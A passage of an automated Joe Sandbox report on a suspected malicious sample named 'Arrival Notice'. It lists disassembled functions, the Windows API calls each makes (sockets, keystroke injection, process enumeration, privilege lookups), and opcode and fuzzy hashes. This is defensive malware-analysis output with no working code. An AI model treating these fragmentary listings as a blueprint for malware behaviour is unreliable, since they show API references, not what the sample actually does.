                  • API String ID: 314563124-0
                  • Opcode ID: 38e44709570edb3e08d754ed3ff45285680f41772339dd6f4422d6ee790875c8
                  • Instruction ID: 000b4591189958765709d0de4c2b7162bc5c610a22a608a0bd8188013efbfbec
                  • Opcode Fuzzy Hash: 38e44709570edb3e08d754ed3ff45285680f41772339dd6f4422d6ee790875c8
                  • Instruction Fuzzy Hash: 65814A71A00109EFCB04DF94C984EEEB7BAFF89315F204159E506AB250DB75AE86CB64
                  Function 003F1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: e47b17d5ccb8933cdc23ca39e890da25d95de3a73464c5457e113f18c4cf713e
                  • Instruction ID: 459533f12abca5ede35a76733f4c5ddd0cd71e1eb02ef00f1828da78fe179dc0
                  • Opcode Fuzzy Hash: e47b17d5ccb8933cdc23ca39e890da25d95de3a73464c5457e113f18c4cf713e
                  • Instruction Fuzzy Hash: B041413650011CEBDB236BBBBC45BBE3AB8EF81330F150626F619DA2D1D67448415771
                  Function 00446278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowRect.USER32(010EEA28,?), ref: 004462E2
                  • ScreenToClient.USER32(?,?), ref: 00446315
                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00446382
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$ClientMoveRectScreen
                  • String ID:
                  • API String ID: 3880355969-0
                  • Opcode ID: aa1ef24e7aa585d1ccb97411092081d7c49eced53798cbf4b7d9fd3d588ae0c6
                  • Instruction ID: 4ff0b8de0cbef4d69541a0b0edf1378162d01bbe6060deb65784b3dfeb54b56d
                  • Opcode Fuzzy Hash: aa1ef24e7aa585d1ccb97411092081d7c49eced53798cbf4b7d9fd3d588ae0c6
                  • Instruction Fuzzy Hash: 49515A74A00249AFEF10DF68D8809AE7BB5FB46364F11826AF8159B3A0D734ED81CB55
                  Function 00431AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                  Download Yara Rule
                  APIs
                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00431AFD
                  • WSAGetLastError.WSOCK32 ref: 00431B0B
                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00431B8A
                  • WSAGetLastError.WSOCK32 ref: 00431B94
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast$socket
                  • String ID:
                  • API String ID: 1881357543-0
                  • Opcode ID: cd969aea1c85c4a4ee875a2cd680b4095ea242a1eccabde9a3103107d660df92
                  • Instruction ID: 3744ec2746c23bdc123494ecf71c42f7dd435e9345c32e59790757a10cd3ce1c
                  • Opcode Fuzzy Hash: cd969aea1c85c4a4ee875a2cd680b4095ea242a1eccabde9a3103107d660df92
                  • Instruction Fuzzy Hash: 2041D434600200AFE725AF20C886F6A77E5AB48718F54845DF61A9F7D3D776ED418B90
                  Function 003EB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 765077d3fb46ddee2a427f6bf7fd15d2d397306a410e524a39c743f3784c373a
                  • Instruction ID: 5d386bcaa7dd4b4896c6ba742aef76bc937dba3ce81c8825fa9db66f742c3957
                  • Opcode Fuzzy Hash: 765077d3fb46ddee2a427f6bf7fd15d2d397306a410e524a39c743f3784c373a
                  • Instruction Fuzzy Hash: 7641F8B5A00358AFD7279F7ACC41B6BBBA9EB84710F10462EF541DF6C2D77199018B80
                  Function 004256D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00425783
                  • GetLastError.KERNEL32(?,00000000), ref: 004257A9
                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004257CE
                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004257FA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateHardLink$DeleteErrorFileLast
                  • String ID:
                  • API String ID: 3321077145-0
                  • Opcode ID: 9376d44fb3b76ba4ebeff74efd5892877025e0f48af77eec8d48c4630a986d8f
                  • Instruction ID: 74a07308417a4dc2bb97afd1217bd38549c094da749694917c0cb2c7b63ff3f9
                  • Opcode Fuzzy Hash: 9376d44fb3b76ba4ebeff74efd5892877025e0f48af77eec8d48c4630a986d8f
                  • Instruction Fuzzy Hash: FF413C39700610DFCB21EF15C445A5ABBE2EF89724B188489E94A5F762CB74FD00CB95
                  Function 003ED8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,003D6D71,00000000,00000000,003D82D9,?,003D82D9,?,00000001,003D6D71,?,00000001,003D82D9,003D82D9), ref: 003ED910
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003ED999
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 003ED9AB
                  • __freea.LIBCMT ref: 003ED9B4
                    • Part of subcall function 003E3820: RtlAllocateHeap.NTDLL(00000000,?,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6,?,003B1129), ref: 003E3852
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: 718964d3456d3374b6eff855c06af928fdc60d689c73275452884733d5afcdd7
                  • Instruction ID: 957ac35ca8f28f6ebb5a31a8a659755421606e2a6d8493c513ac1d50e5e318f6
                  • Opcode Fuzzy Hash: 718964d3456d3374b6eff855c06af928fdc60d689c73275452884733d5afcdd7
                  • Instruction Fuzzy Hash: CB31E572A0025AABDF26CF66DC85EAF7BA5EB41310F050269FC04DB291E735CD50CB90
                  Function 004452C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00445352
                  • GetWindowLongW.USER32(?,000000F0), ref: 00445375
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00445382
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004453A8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LongWindow$InvalidateMessageRectSend
                  • String ID:
                  • API String ID: 3340791633-0
                  • Opcode ID: 489a9e435cf05a3071d80ec5624111dc4ce9235d9b3256318c5251250177f319
                  • Instruction ID: 7823dc9439aa6e71ffc64a971b8f966bba3197ad2a03d81e81f4bae875a9a257
                  • Opcode Fuzzy Hash: 489a9e435cf05a3071d80ec5624111dc4ce9235d9b3256318c5251250177f319
                  • Instruction Fuzzy Hash: 1E310234A55A08EFFF309F14CC46BEA77A5AB05390F584013FE10862E2C7B89D41DB4A
                  Function 0041AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                  Download Yara Rule
                  APIs
                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0041ABF1
                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 0041AC0D
                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 0041AC74
                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0041ACC6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: KeyboardState$InputMessagePostSend
                  • String ID:
                  • API String ID: 432972143-0
                  • Opcode ID: 023765e81f10c9b20af97ce2061efd14d22360b16a2f5c4132da76ce891ff941
                  • Instruction ID: 80432d03f76305ddd9fd2d358223994ada903a28b93746230a3d589bef4bbf7c
                  • Opcode Fuzzy Hash: 023765e81f10c9b20af97ce2061efd14d22360b16a2f5c4132da76ce891ff941
                  • Instruction Fuzzy Hash: F431F630A417186FEB35CB65C8087FB7BA5AB85310F08421BE485922D5E37D89E587DA
                  Function 00447674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                  Download Yara Rule
                  APIs
                  • ClientToScreen.USER32(?,?), ref: 0044769A
                  • GetWindowRect.USER32(?,?), ref: 00447710
                  • PtInRect.USER32(?,?,00448B89), ref: 00447720
                  • MessageBeep.USER32(00000000), ref: 0044778C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Rect$BeepClientMessageScreenWindow
                  • String ID:
                  • API String ID: 1352109105-0
                  • Opcode ID: 0fe4543b98c47f6a1eca6ab6994ca2a391a4192e41d85bafd753ee7be7faad2d
                  • Instruction ID: 8a792bba112bdb6c4848e0dc79a6dc827676b807aa13a4bc5232f223a9dbbe6b
                  • Opcode Fuzzy Hash: 0fe4543b98c47f6a1eca6ab6994ca2a391a4192e41d85bafd753ee7be7faad2d
                  • Instruction Fuzzy Hash: 8A419C78605214DFEB11CF58C894EA977F9BF49314F5980AAE4149B361C738B943CF98
                  Function 004416DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                  Download Yara Rule
                  APIs
                  • GetForegroundWindow.USER32 ref: 004416EB
                    • Part of subcall function 00413A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00413A57
                    • Part of subcall function 00413A3D: GetCurrentThreadId.KERNEL32 ref: 00413A5E
                    • Part of subcall function 00413A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004125B3), ref: 00413A65
                  • GetCaretPos.USER32(?), ref: 004416FF
                  • ClientToScreen.USER32(00000000,?), ref: 0044174C
                  • GetForegroundWindow.USER32 ref: 00441752
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                  • String ID:
                  • API String ID: 2759813231-0
                  • Opcode ID: 616d6717b556fca2a38d5e9578cd3e5f24c11cbae65d76c5fc79b02aded729e0
                  • Instruction ID: 09da2796611196c959e246d495e628879fe723cff9981cdb64a81ca8f6237893
                  • Opcode Fuzzy Hash: 616d6717b556fca2a38d5e9578cd3e5f24c11cbae65d76c5fc79b02aded729e0
                  • Instruction Fuzzy Hash: 67316175D00109AFD701EFAAC8C1CEEB7F9EF48308B5480AAE515E7612D7359E45CBA0
                  Function 0041D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0041D501
                  • Process32FirstW.KERNEL32(00000000,?), ref: 0041D50F
                  • Process32NextW.KERNEL32(00000000,?), ref: 0041D52F
                  • CloseHandle.KERNEL32(00000000), ref: 0041D5DC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 00d025e43e396775aeca479357ec81cdc666574e1cd0c5c196f3ec23f0139357
                  • Instruction ID: 252f9441ae389f62387fc2dcf68154e7e09f231dd58e2f8fbd4a260b2a9da07b
                  • Opcode Fuzzy Hash: 00d025e43e396775aeca479357ec81cdc666574e1cd0c5c196f3ec23f0139357
                  • Instruction Fuzzy Hash: 5231A471508300AFD301EF54C881BEFBBF8EF99358F14092EF685861A1EB719985CB92
                  Function 00448FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  • GetCursorPos.USER32(?), ref: 00449001
                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00407711,?,?,?,?,?), ref: 00449016
                  • GetCursorPos.USER32(?), ref: 0044905E
                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00407711,?,?,?), ref: 00449094
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                  • String ID:
                  • API String ID: 2864067406-0
                  • Opcode ID: ed740055d1bcfceba611bd35392823a2a1f8e60855d57829a06606b86d6dd045
                  • Instruction ID: b7b641794c1a88c9fc29a96d0c22ffc796828c354600dea9d6478dd67294666c
                  • Opcode Fuzzy Hash: ed740055d1bcfceba611bd35392823a2a1f8e60855d57829a06606b86d6dd045
                  • Instruction Fuzzy Hash: AC21BF35601018FFEB25CF94C898EEF3BB9EB4A350F04406AF9058B261C7399D51EB64
                  Function 0041D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesW.KERNEL32(?,0044CB68), ref: 0041D2FB
                  • GetLastError.KERNEL32 ref: 0041D30A
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0041D319
                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0044CB68), ref: 0041D376
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateDirectory$AttributesErrorFileLast
                  • String ID:
                  • API String ID: 2267087916-0
                  • Opcode ID: 6ed68a454a5ac548df2663cff0fb21d9b2000f1bb8688a7d5ec4628679e60a7d
                  • Instruction ID: ca22d8af85581a154c27b5a3db66d003ed791445edd9a89f8f657ecebb1227e2
                  • Opcode Fuzzy Hash: 6ed68a454a5ac548df2663cff0fb21d9b2000f1bb8688a7d5ec4628679e60a7d
                  • Instruction Fuzzy Hash: 4121D6B49052059F8300DF24C8815EB77E4EE56318F144A5EF8A9C72A1D734D986CB9B
                  Function 00411571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00411014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0041102A
                    • Part of subcall function 00411014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00411036
                    • Part of subcall function 00411014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00411045
                    • Part of subcall function 00411014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0041104C
                    • Part of subcall function 00411014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00411062
                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004115BE
                  • _memcmp.LIBVCRUNTIME ref: 004115E1
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00411617
                  • HeapFree.KERNEL32(00000000), ref: 0041161E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                  • String ID:
                  • API String ID: 1592001646-0
                  • Opcode ID: 174e362a498899a0311edc36c6c535038203a98a852d2251693e6bcd56b1fa95
                  • Instruction ID: 14adfe01ffac4f89ceceac6a785de6eb48ff8090573c5e3bb9fee3fad3b2b453
                  • Opcode Fuzzy Hash: 174e362a498899a0311edc36c6c535038203a98a852d2251693e6bcd56b1fa95
                  • Instruction Fuzzy Hash: 2B21CF31E01108EFDF00DFA4C944BEFB7B9EF85344F08445AE501AB261E735AA84CBA4
                  Function 00442782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowLongW.USER32(?,000000EC), ref: 0044280A
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00442824
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00442832
                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00442840
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Long$AttributesLayered
                  • String ID:
                  • API String ID: 2169480361-0
                  • Opcode ID: 6893bd6b17b70b9bde3bfe2c23af03d378c96c522da08461d59999a2354753c3
                  • Instruction ID: 052634b082dd5c7e2bffa87b4ba2b950c4bd317e115976b307fce7ceb8802bc1
                  • Opcode Fuzzy Hash: 6893bd6b17b70b9bde3bfe2c23af03d378c96c522da08461d59999a2354753c3
                  • Instruction Fuzzy Hash: B6213635205110AFE7109B24C940FAAB795AF46324F14825AF4168B6D2CBB5FC42CB94
                  Function 004178F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00418D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0041790A,?,000000FF,?,00418754,00000000,?,0000001C,?,?), ref: 00418D8C
                    • Part of subcall function 00418D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00418DB2
                    • Part of subcall function 00418D7D: lstrcmpiW.KERNEL32(00000000,?,0041790A,?,000000FF,?,00418754,00000000,?,0000001C,?,?), ref: 00418DE3
                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00418754,00000000,?,0000001C,?,?,00000000), ref: 00417923
                  • lstrcpyW.KERNEL32(00000000,?), ref: 00417949
                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00418754,00000000,?,0000001C,?,?,00000000), ref: 00417984
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: lstrcmpilstrcpylstrlen
                  • String ID: cdecl
                  • API String ID: 4031866154-3896280584
                  • Opcode ID: dfc0a08e721e921c8fabf0ba0b09a28aa8f12ea6015c27fd16f5e78f59efe27d
                  • Instruction ID: acfa9dc45c0465b961a17d9ffaf1c5acd717aa4b760e7e4efb004c9ca61922cb
